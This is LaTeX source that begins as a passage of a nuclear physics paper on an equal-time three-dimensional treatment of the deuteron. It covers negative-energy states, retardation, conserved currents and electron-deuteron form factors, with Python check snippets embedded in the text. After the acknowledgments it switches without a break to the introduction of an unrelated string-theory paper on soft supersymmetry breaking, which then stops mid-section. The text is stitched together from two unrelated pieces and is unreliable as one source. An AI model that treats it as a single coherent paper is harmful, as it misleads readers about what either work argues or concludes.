\label{eq:aveG0GC}
\end{equation}
which is consistent with that required by low-energy theorems for
Dirac particles in scalar and vector fields~\cite{Ph97}. Another way
of saying this is to realize that if we compare the $++
\rightarrow ++$ piece of the amplitude
\begin{equation}
V_1 \langle G_0 + G_C \rangle V_1
\end{equation}
to the amplitude obtained at fourth order in the full 4D field theory
then the contribution of negative-energy states agrees at leading
order in $1/M$~\cite{PW98}.
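The simplification produced by this choice can be verified directly: substituting Eq.~(\ref{eq:kappachoice}) into the $+-$ and $-+$ denominators of Eq.~(\ref{eq:aveG0GCgeneral}) collapses them to $2\epsilon_2$ and $2\epsilon_1$, as in Eq.~(\ref{eq:aveG0GC}). A purely algebraic sketch (the $\pm i\epsilon$ prescriptions are dropped and the kinematics are illustrative):

```python
import math

def eps(m, p2):
    """Relativistic single-particle energy sqrt(m^2 + |p|^2)."""
    return math.sqrt(m * m + p2)

# Illustrative equal-mass kinematics (GeV units)
m1 = m2 = 0.939
p2 = 0.09
e1, e2 = eps(m1, p2), eps(m2, p2)
P0 = 2.1

# The choice of Eq. (kappachoice)
kappa20 = 0.5 * (P0 - e1 + e2)

# +- and -+ denominators of the general propagator, Eq. (aveG0GCgeneral)
den_pm = 2.0 * kappa20 - P0 + e1 + e2
den_mp = P0 - 2.0 * kappa20 + e1 + e2

# They collapse to 2*eps2 and 2*eps1, as in Eq. (aveG0GC)
assert math.isclose(den_pm, 2.0 * e2)
assert math.isclose(den_mp, 2.0 * e1)
```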
For bound states the argument of the previous section leads to the 3D
equation:
\begin{equation}
\Gamma_1=U_1 \langle G_0 + G_C \rangle \Gamma_1.
\label{eq:3DET}
\end{equation}
Equation (\ref{eq:3DET}) is a bound-state equation which incorporates
relativistic effects and the physics of negative-energy states.
For instance, Fig.~\ref{fig-Zgraph} shows one example of a
graph which is included in Eq.~(\ref{eq:3DET}), even if only the
lowest-order kernel $U_1^{(2)}$ is used, because of our careful treatment
of the one-body limit.
\begin{figure}[h]
\centerline{\BoxedEPSF{fig1.eps scaled 350}}
\caption{One example of a Z-graph which is included in our
3D equation (\ref{eq:3DET}).}
\label{fig-Zgraph}
\end{figure}
\section{Results for the deuteron}
\label{sec-Section4}
To calculate observables in the deuteron we now consider two types of
kernels $U_1$, both of which are calculated within the framework
of a one-boson exchange model for the $NN$ interaction:
\begin{enumerate}
\item $U_1=U_{\rm inst}$, the instantaneous interaction.
\item A kernel $U_1^{(2)}$ which is a retarded interaction. This is
obtained from Eq.~(\ref{eq:K12}) by the substitutions $K_1^{(2)}
\rightarrow U_1^{(2)}$ and $G_0 \rightarrow G_0 + G_C$.
\end{enumerate}
These interactions are used in a two-body equation with the full ET
Green's function given by Eq.~(\ref{eq:3DET}), and also in an equation
in which only the $++$ sector is retained. For the instant
interaction, we follow the practice of Devine and Wallace~\cite{WD94}
and switch off couplings between the $++$ and $--$ sectors, and
between the $+-$ and $-+$ sectors. A partial justification of this
rule follows from an analysis of the static limit of our 3D retarded
interaction.
The mesons in our one-boson exchange model are the $\pi(138)$, the
$\sigma(550)$, the $\eta(549)$, the $\rho(769)$, the $\omega(782)$,
and the $\delta(983)$. All the parameters of the model, except for
the $\sigma $ coupling, are taken directly from the Bonn-B fit to the
$NN$ phase shifts~\cite{Ma89}---which is a fit performed using a
relativistic wave equation and relativistic propagators for the
mesons. The $\sigma$ coupling is varied so as to achieve the correct
deuteron binding energy for each interaction considered. Of course, we
should refit the parameters of our $NN$ interaction using our
different scattering equations. However, for a first estimate of the
importance of negative-energy states and retardation we adopt this
simpler approach to constructing the interaction. Work on improving
the $NN$ interaction model is in progress~\cite{PW98B}.
Once a particular interaction is chosen, the integral equation
(\ref{eq:3DET}) is solved for the bound-state energy. In each
calculation, the $\sigma$ coupling is adjusted to get the correct
deuteron binding energy, producing the results (accurate to three
significant figures) given in Table~\ref{table-sigmacoupling}. The
value given for the instant calculation with positive-energy states
alone is that found in the original Bonn-B fit. In all other cases the
$\sigma$ coupling must be adjusted to compensate for the inclusion of
retardation, the effects of negative-energy states, etc. We believe
that this adjustment of the scalar coupling strength is sufficient to
get a reasonable deuteron wave function. The static properties of this
deuteron are very similar to those of a deuteron calculated with the
usual Bonn-B interaction.
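In practice, solving Eq.~(\ref{eq:3DET}) means discretizing the kernel on a momentum grid and adjusting a parameter until the discretized operator $U_1 \langle G_0 + G_C \rangle$ has eigenvalue one at the desired binding energy. A minimal sketch of such an outer coupling-adjustment loop, using a toy rank-one matrix in place of the physical kernel (all names and numbers are illustrative, not the actual Bonn-B machinery):

```python
import numpy as np

def largest_eigenvalue(M):
    """Largest eigenvalue magnitude of the discretized kernel matrix."""
    return np.abs(np.linalg.eigvals(M)).max()

def tune_coupling(M, lo=0.0, hi=100.0, tol=1e-12):
    """Bisect on an overall coupling s until the largest eigenvalue of s*M
    equals 1 -- the bound-state condition for Gamma = s*M Gamma."""
    while hi - lo > tol:
        mid = 0.5 * (lo + hi)
        if largest_eigenvalue(mid * M) < 1.0:
            lo = mid
        else:
            hi = mid
    return 0.5 * (lo + hi)

# Toy rank-one ("separable") kernel matrix standing in for the discretized
# U1 <G0 + GC> on an 8-point momentum grid.
rng = np.random.default_rng(0)
g = rng.random(8)
M = np.outer(g, g)
s = tune_coupling(M)
# For a rank-one kernel the condition s * (g.g) = 1 is analytic:
assert np.isclose(s, 1.0 / (g @ g), atol=1e-8)
```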
Once the bound-state wave function in the center-of-mass frame has
been determined in this fashion, it is a simple matter to solve the
integral equation (\ref{eq:3DET}) in any other frame. We choose to
calculate electron-deuteron scattering in the Breit frame. The
interaction is recalculated in the Breit frame for a given $Q^2$, and
then the integral equation is solved with this new interaction.
Because the formalism we use for reducing the four-dimensional
integral equation to three dimensions is {\it not} Lorentz invariant
there is a violation of Lorentz invariance in this calculation.
Estimates of the degree to which Lorentz invariance is violated are
given in Ref.~\cite{PW98}.
\begin{table}[htbp]
\caption{Sigma coupling required to produce the correct deuteron binding
energy in the four different models under consideration here.}
\label{table-sigmacoupling}
\begin{center}
\begin{tabular}{|c|c|c|}
\hline
{\bf Interaction} & {\bf States included} & {\bf $g_\sigma^2/4 \pi$} \\
\hline
Instant & ++ & 8.08 \\ \hline
Retarded & ++ & 8.39 \\ \hline
Instant & All & 8.55 \\ \hline
Retarded & All & 8.44 \\ \hline
\end{tabular}
\end{center}
\end{table}
\section{Current conservation}
\label{sec-Section5}
\subsection{Currents in the three-dimensional formalism}
\label{sec-3Dcurrents}
As discussed in the Introduction, we now want to compare the predictions
of this formalism with experimental data gained in electron scattering
experiments. In calculating the interaction of the electron
with the hadronic bound state it is crucial to derive a
3D reduction of the electromagnetic current which is consistent with
the reduction of the scattering equation we have chosen to use here.
The current in the full four-dimensional formalism is obtained by
coupling photons everywhere on the right-hand side of
Eq.~(\ref{eq:BSE}). This produces the following gauge-invariant
result for the photon's interaction with the bound state:
\begin{eqnarray}
{\cal A}_\mu&=&\bar{\Gamma}(P') G_0(P') J_\mu G_0 (P) \Gamma(P) \nonumber\\
&+& \bar{\Gamma}(P') G_0(P') K_\mu^\gamma G_0 (P) \Gamma(P),
\label{eq:gi4damp}
\end{eqnarray}
where $P$ and $P'$ are the initial and final total four-momenta of the
deuteron bound state. Here $J_\mu$ contains the usual one-body
currents and $K_\mu^\gamma$ represents two-body contributions which
are necessary for maintaining the Ward-Takahashi identities. All
integrals implicitly are four-dimensional. The connection to the
three-dimensional amplitude, $\Gamma_1$, obtained from
Eq.~(\ref{eq:3DET}) is made by inserting Eq.~(\ref{eq:GcalGamma1})
into Eq.~(\ref{eq:gi4damp}), giving
\begin{equation}
{\cal A}_\mu=\bar{\Gamma}_1(P') \langle {\cal G}(P')
\left[J_\mu + K_\mu^\gamma \right] {\cal G}(P) \rangle \Gamma_1(P).
\label{eq:Amu}
\end{equation}
Once the effective operator $\langle {\cal G}(P') \left[J_\mu +
K_\mu^\gamma \right] {\cal G}(P) \rangle$ is calculated the
expression (\ref{eq:Amu}) involves only three-dimensional integrals.
Since ${\cal G}$ is an infinite series in $K-K_1$ this result would
not be much help on its own. But, given a result for $\Gamma_1$
obtained by systematic expansion of $K_1$, the amplitude ${\cal
A}_\mu$ can be analogously expanded in a way that maintains current
conservation. $K_1$ as defined by Eq.~(\ref{eq:K1}) is an infinite
series; imposing the condition (\ref{eq:calGeq}) order-by-order in the
expansion in $K-K_1$ defines $K_1$ to some finite order. The
question is: Does a corresponding 3D approximation for the current
matrix element (\ref{eq:Amu}) exist that maintains the Ward-Takahashi
identities of the theory? {\it It turns out that the current matrix
element (\ref{eq:Amu}) is conserved if ${\cal G} (J_\mu +
K^\gamma_\mu) {\cal G}$ on the right-hand side of Eq.~(\ref{eq:Amu})
is expanded to a given order in the coupling constant and the kernel
$K_1$ used to define $\Gamma_1$ is obtained from
Eq.~(\ref{eq:calGeq}) by truncation at the same order in the
coupling constant.}
This is done by splitting the right-hand side of Eq.~(\ref{eq:Amu})
into two pieces, one due to the one-body current $J_\mu$, and one due
to the two-body current $K^\gamma_\mu$. If $K_1$ has been truncated at
lowest order---i.e., $K_1=K_1^{(2)}$---then, in the $J_\mu$ piece, we
expand the $\cal G$s and retain terms up to the same order in
$K^{(2)}-K_1^{(2)}$. A piece from the two-body current, in which we
write ${\cal G}=G_0$, is added to this. That is, we define our
second-order approximation to ${\cal A}_\mu$, ${\cal A}_\mu^{(2)}$, by
\begin{eqnarray}
{\cal A}^{(2)}_\mu&=&\bar{\Gamma}_1(P') \langle G^\gamma_{0 \mu}
\rangle \Gamma_1(P) \nonumber \\ &+& \bar{\Gamma}_1(P') \langle G_0(P') (K^{(2)}(P')-K^{(2)}_1(P'))
G^\gamma_{0 \mu} \rangle \Gamma_1(P)
\nonumber\\
&+& \bar{\Gamma}_1(P') \langle G^{\gamma}_{0 \mu} (K^{(2)}(P)-K^{(2)}_1(P)) G_0(P) \rangle
\Gamma_1(P)
\nonumber\\
&+& \bar{\Gamma}_1(P') \langle G_0(P') K^{\gamma (2)}_\mu G_0(P) \rangle
\Gamma_1(P),
\label{eq:A2mu}
\end{eqnarray}
where ${G_0^\gamma}_\mu=G_0(P') J_\mu G_0(P)$. It can now be shown
that if Eq.~(\ref{eq:calGeq}) expanded to second order defines
$K_1^{(2)}$, the corresponding amplitude for electromagnetic
interactions of the bound state, as defined by Eq.~(\ref{eq:A2mu}),
exactly obeys
\begin{equation}
Q^\mu {\cal A}^{(2)}_\mu=0.
\label{eq:A1WTI}
\end{equation}
It is straightforward to check that the same result holds if
Eq.~(\ref{eq:calGeq}) for $K_1$ is truncated at fourth order, while
the one-body and two-body current pieces are expanded to fourth order.
The amplitude ${\cal A}_\mu^{(2)}$ includes contributions from
diagrams where the photon couples to particles one and two while
exchanged quanta are ``in-flight''. These contributions are of two
kinds. Firstly, if the four-dimensional kernel $K$ is dependent on
the total momentum, or if it involves the exchange of charged
particles, then the WTIs in the 4D theory require that $K_\mu^\gamma$
contain terms involving the coupling of the photon to internal lines
in $K$. Secondly, even if such terms are not present, terms arise in
the three-dimensional formalism where the photon couples to particles
one and two while an exchanged meson is ``in-flight''. These must be
included if our 3D approach is to lead to a conserved current. (See
Fig.~\ref{fig-inflight} for one such mechanism.)
\begin{figure}[h]
\centerline{\BoxedEPSF{fig2.eps scaled 350}}
\caption{One example of a two-body current that is required in our formalism
in order to maintain current conservation.}
\label{fig-inflight}
\end{figure}
A special case of the above results occurs when retardation effects
are omitted, i.e., the kernel $K_1=K_{\rm inst}$ is chosen, and the
bound-state equation (\ref{eq:3Deqn}) is solved to get the vertex
function $\Gamma_1=\Gamma_{\rm inst}$. Then a simple conserved current
is found:
\begin{equation}
{\cal A}_{{\rm inst},\mu}=\bar{\Gamma}_{\rm inst}(P') \langle
G_{0 \mu}^\gamma \rangle \Gamma_{\rm inst}(P) + \bar{\Gamma}_{\rm
inst}(P') \langle G_0(P') \rangle {K^\gamma_{\rm inst}}_\mu
\langle G_0(P) \rangle \Gamma_{\rm inst}(P),
\label{eq:instantme}
\end{equation}
where we have also replaced the meson-exchange current kernel
$K^\gamma_\mu$ by the instant approximation to it.
\subsection{Current conservation in the 4D formalism with $G_C$}
In Ref.~\cite{PW98} we showed how to construct a conserved current
consistent with the 4D equation
\begin{equation}
\Gamma=U (G_0 + G_C) \Gamma.
\label{eq:4DET}
\end{equation}
This turns out to be a moderately complicated exercise, because the
propagator $G_C$ depends on the three-momenta of particles one and
two, not only in the usual way, but also through the choice
(\ref{eq:kappachoice}) made for $\kappa_2^0$ above. However, a 4D
current ${\cal G}_{0,\mu}^\gamma = {G_0^\gamma}_\mu +
{G_C^\gamma}_\mu$ corresponding to the free Green's function $G_0 +
G_C$ can be constructed. Its form is displayed in Ref.~\cite{PW98} and
is not really germane to our purposes here, for, as we shall see
hereafter, only certain pieces of the current ${\cal
G}_{0,\mu}^\gamma$ are actually used in our calculations.
\subsection{Reduction to 3D and the ET current}
Having constructed a 4D current for the formalism involving $G_C$ that
obeys the required Ward-Takahashi identity, we can apply the reduction
formalism of Section~\ref{sec-3Dcurrents} to obtain the currents
corresponding to the 3D reduction of this 4D theory. The result is:
\begin{eqnarray}
{\cal A}^{(2)}_\mu&=&\bar{\Gamma}_{1,{\rm ET}}(P') \langle {\cal
G}^\gamma_{0,\mu} \rangle \Gamma_{1,{\rm ET}}(P) \nonumber\\
&+& \bar{\Gamma}_{1,{\rm ET}}(P') \langle
(G_0 + G_C)(P') (K^{(2)}(P')-U_1^{(2)}(P')) {\cal G}^\gamma_{0,\mu}
\rangle \Gamma_{1,{\rm ET}}(P)
\nonumber\\
&+& \bar{\Gamma}_{1,{\rm ET}}(P') \langle {\cal G}^{\gamma}_{0,\mu}
(K^{(2)}(P)-U_1^{(2)}(P)) (G_0 + G_C)(P) \rangle \Gamma_{1,{\rm ET}}(P)
\nonumber\\
&+& \bar{\Gamma}_{1,{\rm ET}}(P') \langle (G_0 + G_C)(P') K^{\gamma (2)}_\mu
(G_0 + G_C)(P) \rangle \Gamma_{1,{\rm ET}}(P),
\label{eq:general3DETcurrent(2)}
\end{eqnarray}
where $\Gamma_{1,{\rm ET}}$ is the solution of Eq.~(\ref{eq:3DET}) with
$U_1=U_1^{(2)}$.
This current obeys the appropriate Ward-Takahashi identity. In fact in
one-boson exchange models the only contributions to $K^{\gamma
(2)}_\mu$ give rise to isovector structures, and so their
contribution to electromagnetic scattering off the deuteron is zero.
\subsection{Impulse-approximation current based on the instant
approximation to ET formalism}
Just as in the case of the Bethe-Salpeter equation, if the instant
approximation is used to obtain a bound-state equation with an instant
interaction from Eq.~(\ref{eq:4DET}) then a corresponding simple
conserved impulse current can be constructed:
\begin{equation}
{\cal A}_{{\rm inst},\mu}=\bar{\Gamma}_{\rm inst}
\langle {\cal G}^\gamma_{0,\mu} \rangle
\Gamma_{\rm inst}.
\end{equation}
Now we note that the full result for ${\cal G}^\gamma_{0,\mu}$ was
constructed in order to obey Ward-Takahashi identities in the full
four-dimensional theory. It is not necessary to use this result if we
are only concerned with maintaining WTIs at the three-dimensional
level in the instant approximation. Therefore we may construct the
corresponding current
\begin{eqnarray}
&& {\cal G}_{{\rm inst},\mu}^\gamma({\bf p}_1,{\bf p}_2;P,Q)=i \langle d_1(p_1)
d_2(p_2+Q) j^{(2)}_\mu d_2(p_2) \nonumber\\
&& \qquad + d_1(p_1) d_2^{\tilde{c}}(p_2+Q) j^{(2)}_{c,\mu} d_2^c(p_2) \rangle
+ (1 \leftrightarrow 2).
\end{eqnarray}
Here $d_i$ is the Dirac propagator for particle $i$, and $j_\mu=q
\gamma_\mu$ is the usual one-body current, with $q$ the charge of
the particle in question. Meanwhile $d_i^c$ is a one-body Dirac
propagator used in $G_C(P)$ to construct the approximation to the
crossed-ladder graphs. Correspondingly, $d_i^{\tilde{c}}$ appears in
$G_C(P+Q)$, which does {\it not} equal $d_i^c$, even if particle $i$
is not the nucleon struck by the photon. Finally,
\begin{equation}
j^{(2)}_{c,\mu}= q_2 \gamma_\mu - \tilde{j}^{(2)}_\mu,
\end{equation}
where
\begin{equation}
\tilde{j}^{(2)}_\mu=q_2 \frac{\hat{p}_{2 \mu}' + \hat{p}_{2
\mu}}{\epsilon_2' + \epsilon_2} {\gamma_{2}}_0,
\label{eq:tildej2}
\end{equation}
with $\hat{p}_2=(\epsilon({\bf p}_2),{\bf p}_2)$. (For further
explanation of these quantities and the necessity of their appearance
here the reader is referred to Ref.~\cite{PW98}.)
If a vertex function $\Gamma_{{\rm inst}}$ is constructed to be a
solution to Eq.~(\ref{eq:3DET}) with an instant interaction then the
three-dimensional hadronic current:
\begin{equation}
{\cal A}_{{\rm inst},\mu}= \bar{\Gamma}_{\rm inst} {\cal G}_{{\rm inst},\mu}^\gamma \Gamma_{\rm inst}
\label{eq:instAmu}
\end{equation}
is conserved. This current is simpler than the full ET current and
omits only effects stemming from retardation in the current. Our
present calculations are designed to provide an assessment of the role
of negative-energy states and retardation effects in the vertex
functions. Therefore we use the simple current (\ref{eq:instAmu}) in
{\it all} of our calculations here---even the ones where $\Gamma_1$ is
calculated using a retarded two-body interaction. The effects stemming
from retardation in the current are expected to be minor, and so we
expect this to be a good approximation to the full current in the
three-dimensional theory. Future calculations should be performed to
check the role of meson retardation in that current.
\section{Results for electron-deuteron scattering}
\label{sec-Section6}
\subsection{Impulse approximation}
We are now ready to calculate the experimentally observed deuteron
electromagnetic form factors $A$ and $B$, and the tensor polarization
$T_{20}$. These are straightforwardly related to the charge,
quadrupole, and magnetic form factors of the deuteron, $F_C$, $F_Q$,
and $F_M$. These form factors in turn are related to the Breit frame
matrix elements of the current ${\cal A}_\mu$ discussed in the
previous section,
\begin{eqnarray}
F_C&=&\frac{1}{3\sqrt{1 + \eta}e} (\langle 0|{\cal A}^0| 0 \rangle
+ 2 \langle +1|{\cal A}^0|+1 \rangle),\\
F_Q&=&\frac{1}{2 \eta \sqrt{1 + \eta} e} (\langle 0|{\cal A}^0| 0 \rangle
- \langle +1|{\cal A}^0|+1 \rangle),\\
F_M&=& \frac{-1}{\sqrt{2 \eta (1 + \eta)}e} \langle +1|{\cal A}_+|0\rangle,
\end{eqnarray}
where $|+1 \rangle$, $|0 \rangle$ and $|-1 \rangle$ are the
three different spin states of the deuteron.
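The extraction of $F_C$, $F_Q$, and $F_M$ from the Breit-frame matrix elements can be sketched directly from the equations above. Here $\eta$ is the standard kinematic variable (conventionally $Q^2/4M_d^2$; an assumption on our part, since it is not defined in the text) and the matrix-element values are purely illustrative:

```python
import math

def deuteron_form_factors(A0_00, A0_pp, Aplus_p0, eta, e=1.0):
    """Breit-frame extraction of (F_C, F_Q, F_M) from current matrix elements:
    A0_00 = <0|A^0|0>, A0_pp = <+1|A^0|+1>, Aplus_p0 = <+1|A_+|0>."""
    root = math.sqrt(1.0 + eta)
    FC = (A0_00 + 2.0 * A0_pp) / (3.0 * root * e)
    FQ = (A0_00 - A0_pp) / (2.0 * eta * root * e)
    FM = -Aplus_p0 / (math.sqrt(2.0 * eta * (1.0 + eta)) * e)
    return FC, FQ, FM

# If the m=0 and m=+1 charge matrix elements coincide, the quadrupole
# form factor vanishes and F_C reduces to the common matrix element
# divided by sqrt(1 + eta):
FC, FQ, FM = deuteron_form_factors(0.5, 0.5, 0.0, eta=0.25)
assert math.isclose(FQ, 0.0)
assert math.isclose(FC, 0.5 / math.sqrt(1.25))
```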
We take the wave functions constructed for the four different
interactions of Section~\ref{sec-Section4} and insert them into the
expression (\ref{eq:instAmu}). In using any of the interactions
obtained with only positive-energy state propagation we drop all
pieces of the operator ${\cal G}^\gamma_{{\rm inst},\mu}$ in
negative-energy sectors.
The single-nucleon current used in these calculations is the usual one
for extended nucleons. We choose to parametrize the single-nucleon
form factors $F_1$ and $F_2$ via the 1976 Hohler fits~\cite{Ho76}.
Choosing different single-nucleon form factors does not affect our
qualitative conclusions, although it has some impact on our
quantitative results for $A$, $B$, and $T_{20}$.
Using this one-body current we then calculate the current matrix
elements via Eq.~(\ref{eq:Amu}). This is a conserved current if the
vertex function $\Gamma_1$ is calculated from an instant potential.
However, if a potential including meson retardation is used it
violates the Ward-Takahashi identities by omission of pieces that are
required because of the inclusion of retardation effects in the
calculation. Work is in progress to estimate the size of these
effects.
\begin{figure}[htbp]
\centerline{\BoxedEPSF{IA.eps scaled 500}}
\caption{The form factors $A(Q^2)$ and $B(Q^2)$ and the tensor
polarization $T_{20}$ for the deuteron calculated in impulse
approximation. The dash-dotted line represents a calculation using a
vertex function generated using the instant interaction. Meanwhile
the solid line is the result obtained with the retarded vertex
function. The dotted and long dashed lines are obtained by
performing calculations with instant and retarded interactions in which
no negative-energy states are included.}
\label{fig-IA}
\end{figure}
The results for the impulse approximation calculation of the
experimental observables $A$, $B$, and $T_{20}$ are displayed in
Fig.~\ref{fig-IA}. We also show experimental data from
Refs.~\cite{El69,Ar75,Si81,Cr85,Pl90} for $A$, from
Refs.~\cite{Si81,Cr85,Au85,Bo90} for $B$ and from
Ref.~\cite{Sc84} for $T_{20}$. A number of
two-body effects must be added to our calculations before they can be
reliably compared to experimental data. However, even here we see the
close similarity of the results for these observables in all four
calculations. The only really noticeable difference occurs at the
minimum in $B$. There, including the negative-energy states in the
calculation shifts the minimum to somewhat larger $Q^2$. A similar
effect was observed by van Orden {\it et al.}~\cite{vO95} in
calculations of electron-deuteron scattering using the spectator
formalism. However, note that here, in contradistinction to the
results of Ref.~\cite{vO95}, the inclusion of negative-energy states
does {\it not} bring the impulse approximation calculation into
agreement with the data.
The fact that negative-energy states seem to have a smaller effect on
observables in the ET analysis than in the spectator analysis of van
Orden et al.~\cite{vO95} is somewhat surprising since our ``ET''
propagator has twice the negative-energy state propagation amplitude
of the spectator propagator. Thus, other differences between the ET and
spectator models, not just differences in the role of negative-energy
states in the two approaches, appear to be responsible for Ref.~\cite{vO95}'s
success in reproducing the minimum in $B$.
For the tensor polarization $T_{20}$ the different models produce
results which are very similar. This suggests that this observable is
fairly insensitive to dynamical details of the deuteron model, at
least up to $Q^2=4 \,\, \rm{GeV}^2$.
\subsection{Meson-exchange currents}
As $Q^2$ increases the cross-section due to the impulse approximation
diagrams drops precipitously. Thus we expect that in some regime other
interactions may become competitive with the impulse mechanism. One
such possibility is that the photon will couple to a meson while that
meson is in flight. Because of the deuteron's isoscalar nature and
the conservation of G-parity, the lowest mass state which can
contribute in such meson-exchange current (MEC) diagrams is one where
the photon induces a transition from a $\pi$ to a $\rho$.
This $\rho \pi \gamma$ MEC is a conserved current whose structure can
be found in Refs.~\cite{HT89,De94}. The couplings and form factors for
the meson-nucleon-nucleon vertices are all taken to be consistent with
those used in our one-boson-exchange interaction. Meanwhile, the $\rho
\pi \gamma$ coupling is set to the value $g_{\rho \pi \gamma}=0.56$,
and a vector meson dominance form factor is employed at the $\rho \pi
\gamma$ vertex: $F_{\rho \pi \gamma}(q)=1/(q^2 - m_\omega^2)$. The
value of this MEC is added to the impulse contribution calculated
above and $A$, $B$, and $T_{20}$ are calculated. This is done with the
vertex function obtained from an instant interaction, and consequently
the electromagnetic current is exactly conserved. The results of this
calculation are displayed in Fig.~\ref{fig-RPG}. We see that at $Q^2$
of order 2 ${\rm GeV}^2$ the $\rho \pi \gamma$ MEC makes a significant
contribution to all three observables. However, far from improving the
agreement of the position of the minimum in the $B$ form factor with
the experimental data, this particular MEC moves the theoretical result
{\it away} from the data---as noted by Hummel and Tjon~\cite{HT89},
and seen within a simplified version of the formalism presented here
by Devine~\cite{De94}. Thus, it would seem that some physics beyond
the impulse approximation other than the $\rho \pi \gamma$ MEC plays a
significant role in determining the position of the minimum in
$B(Q^2)$.
\begin{figure}[htbp]
\centerline{\BoxedEPSF{RPG.eps scaled 500}}
\caption{The form factors $A(Q^2)$ and $B(Q^2)$ together with the
tensor polarization for the deuteron. The long dashed line is an
impulse approximation calculation with an instant interaction. The
solid line includes the effect of the $\rho \pi \gamma$
MEC.}
\label{fig-RPG}
\end{figure}
\section{Conclusion}
\label{sec-Section7}
A systematic theory of the electromagnetic interactions of
relativistic bound states is available in three dimensions. In this
formalism integrations are performed over the zeroth component of the
relative momentum of the two particles, leading to the construction of
``equal-time'' (ET) Green's functions. If the formalism is to
incorporate the Z-graphs that are expected in a quantum field theory,
then the propagator must include terms coming from crossed Feynman
graphs. Here we have displayed a three-dimensional propagator that
includes these effects correctly to leading order in $1/M$.
Given a suitable choice for the ET propagator, the electromagnetic and
interaction currents which should be used with it can be calculated.
If these are truncated in a fashion consistent with the truncation of
the $NN$ interaction in the hadronic field theory then the
Ward-Takahashi identities are maintained in the three-dimensional
theory. A full accounting of the dynamical role played by
negative-energy states and of retardations in electromagnetic
interactions of the deuteron is thereby obtained.
Calculations have been performed for both the impulse approximation
and when the $\rho \pi \gamma$ MEC is included. In our MEC
calculations we use an instant approximation for the electromagnetic
current. This current satisfies current conservation when used with
deuteron vertex functions that are calculated with instant interactions.
We also have used this simpler current with vertex functions which
are calculated with the retarded interactions obtained within the
ET formalism.
Comparing impulse approximation calculations with and without
negative-energy states indicates that the role played by
negative-energy state components of the deuteron vertex function is
small. This corroborates the results of Hummel and Tjon and is in
contrast to those obtained in Ref.~\cite{vO95}. Because the ET
formalism incorporates the relevant Z-graphs in a preferable way, we
are confident that these Z-graphs really do play only a minor role in
calculations that are based upon standard boson-exchange models of the
$NN$ interaction.
The results for impulse approximation calculations of the
electromagnetic observables are relatively insensitive to the
distinction between a vertex calculated with retardations included and
one calculated in the instantaneous approximation. The results of both
calculations fall systematically below experimental data for the form
factors $A$ and $B$ for $Q$ of order 1 GeV. This deficiency at higher
$Q$ suggests that mechanisms other than the impulse approximation
graph should be significant. Indeed, when the $\rho \pi \gamma$ MEC
graph is included in our calculation it somewhat remedies the result
for $A(Q^2)$. However, it fails to narrow the gap between our result
for $B(Q^2)$ and the existing experimental data. The significant gap
that remains between our theoretical result for $B(Q^2)$ and the data
indicates that it is an interesting observable in which to look for
physics of the deuteron other than the simple impulse mechanism or the
standard $\rho \pi \gamma$ MEC. Finally, the existing tensor
polarization data are reasonably well described. This is consistent
with previous analyses which have shown $T_{20}$ to be less sensitive
to non-impulse mechanisms.
\section*{Acknowledgments}
It is a pleasure to thank Steve Wallace for a fruitful and enjoyable
collaboration on this topic, and for his comments on this manuscript.
I am also very grateful to Neal Devine for giving us the original
version of the computer code to calculate these reactions, and to
Betsy Beise for useful information on the experimental situation.
Finally, I want to thank the organizers of this workshop for a
wonderful week of physics in Elba! This work was supported by the U.~S.
Department of Energy under grant no. DE-FG02-93ER-40762.
\section{Introduction}
Superstring theories are powerful candidates for the unification
theory of all forces including gravity.
The supergravity theory (SUGRA) is effectively constructed from
4-dimensional
(4D) string model using several methods \cite{ST-SG,OrbSG,OrbSG2}.
The structure of SUGRA is constrained
by gauge symmetries including an anomalous $U(1)$ symmetry
($U(1)_A$) \cite{ST-FI} and stringy symmetries
such as duality \cite{duality}.
4D string models have several open questions and
two of them are pointed out here.
The first one is what the origin of supersymmetry (SUSY) breaking is.
Although interesting scenarios
such as SUSY breaking due to gaugino condensation \cite{gaugino}
and the Scherk-Schwarz mechanism \cite{SS}
have been proposed, a realistic one has not been identified yet.
The second one is how the vacuum expectation value (VEV) of the dilaton
field $S$ is stabilized.
It is difficult to realize the stabilization with a realistic VEV of $S$
using a K\"ahler potential at the tree level alone
without any conspiracy among several terms which
appear in the superpotential \cite{S-Stab}.
A K\"ahler potential generally receives radiative
corrections as well as non-perturbative ones.
Such corrections may be sizable for the part related to
$S$ \cite{corr1,corr2}.
It is important to solve these enigmas
in order not only to understand the structure of a more fundamental theory
at a high energy scale but also to know the complete SUSY particle spectrum
at the weak scale, but this is not an easy task
because of our ignorance of the explicit form of the
fully corrected total K\"ahler potential.
At present, it would be meaningful to obtain model-independent information
on the SUSY particle spectrum.\footnote{
The stability of $S$ and soft SUSY breaking parameters are discussed
in the dilaton SUSY breaking scenario in Ref.\cite{Casas}.}
In this paper, we study the magnitudes of soft SUSY breaking parameters
in heterotic string models with $U(1)_A$ and derive model-independent
predictions for them
without specifying SUSY breaking mechanism
and the dilaton VEV fixing mechanism.
The idea is based on that in the work by Ref.\cite{ST-soft}.
The soft SUSY breaking terms have been derived from
``standard string model'' and analyzed
under the assumption that SUSY is broken by $F$-term condensations
of the dilaton field and/or moduli fields $M^i$.
We relax this assumption such that
SUSY is broken by $F$-term condensation of $S$, $M^i$ and/or
matter fields with non-vanishing $U(1)_A$ charge
since the scenario based on $U(1)_A$ as a mediator
of SUSY breaking is also possible \cite{DP}.
In particular, we make a comparison of magnitudes between
$D$-term contribution to scalar masses and $F$-term ones and
a comparison of magnitudes among scalar masses, gaugino masses
and $A$-parameters.
The features of our analysis are as follows.
The study is carried out in the framework of SUGRA
model-independently,\footnote{The model-dependent analyses are carried out
in Ref.\cite{DP,model-dep1,model-dep2}.}
i.e., we do not specify SUSY breaking mechanism, extra matter contents,
the structure of superpotential and
the form of K\"ahler potential related to $S$.
We treat all fields including $S$ and $M^i$ as dynamical fields.
The paper is organized as follows.
In the next section, we explain the general structure of SUGRA briefly
with some basic assumptions of SUSY breaking.
We study the magnitudes of soft SUSY breaking parameters
in heterotic string models with $U(1)_A$ model-independently in section 3.
Section 4 is devoted to conclusions and some comments.
\section{General structure of SUGRA}
We begin by reviewing the scalar potential in SUGRA \cite{SUGRA,JKY}.
It is specified by two functions, the total K\"ahler
potential $G(\phi, \bar \phi)$ and the gauge kinetic function
$f_{\alpha \beta}(\phi)$ with $\alpha$, $\beta$ being indices of
the adjoint representation of the gauge group.
The former is a sum of the K\"ahler potential $K(\phi, \bar \phi)$
and (the logarithm of) the superpotential $W(\phi)$
\begin{equation}
G(\phi, \bar \phi)=K(\phi, \bar \phi) +M^{2}\ln |W (\phi) /M^{3}|^2
\label{total-Kahler}
\end{equation}
